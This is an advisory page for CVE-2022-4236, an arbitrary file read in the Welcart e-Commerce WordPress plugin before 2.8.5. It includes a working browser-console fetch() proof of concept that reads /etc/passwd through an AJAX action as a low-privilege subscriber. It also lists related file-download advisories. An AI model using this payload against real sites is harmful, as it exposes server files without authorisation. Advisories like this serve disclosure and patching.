Welcart e-Commerce < 2.8.5 – Subscriber+ Arbitrary File Access | CVE 2022-4236 | Plugin Vulnerabilities

Description

The plugin does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated users, which could allow users with a role as low as subscriber to read arbitrary files on the server.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wel_check_progress_ajax&progressfile=/etc/passwd',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Fixed in 2.8.5

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

436d8894-dab8-41ea-8ed0-a3338aded635

Timeline

Publicly Published

2022-12-05 (about 1 years ago)

Added

2022-12-06 (about 1 years ago)

Last Updated

2022-12-06 (about 1 years ago)

Other

Published

Title

Published

2019-06-02

Title

Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download

Published

2022-12-05

Title

Welcart e-Commerce < 2.8.5 - Unauthenticated Arbitrary File Access

Published

2021-02-13

Title

Theme Editor < 2.6 - Authenticated Arbitrary File Download

Published

2022-11-22

Title

SMSA Shipping for WooCommerce < 1.0.5 - Subscriber+ Arbitrary File Download

Published

2022-09-19

Title

Download Monitor < 4.5.98 - Admin+ Arbitrary File Download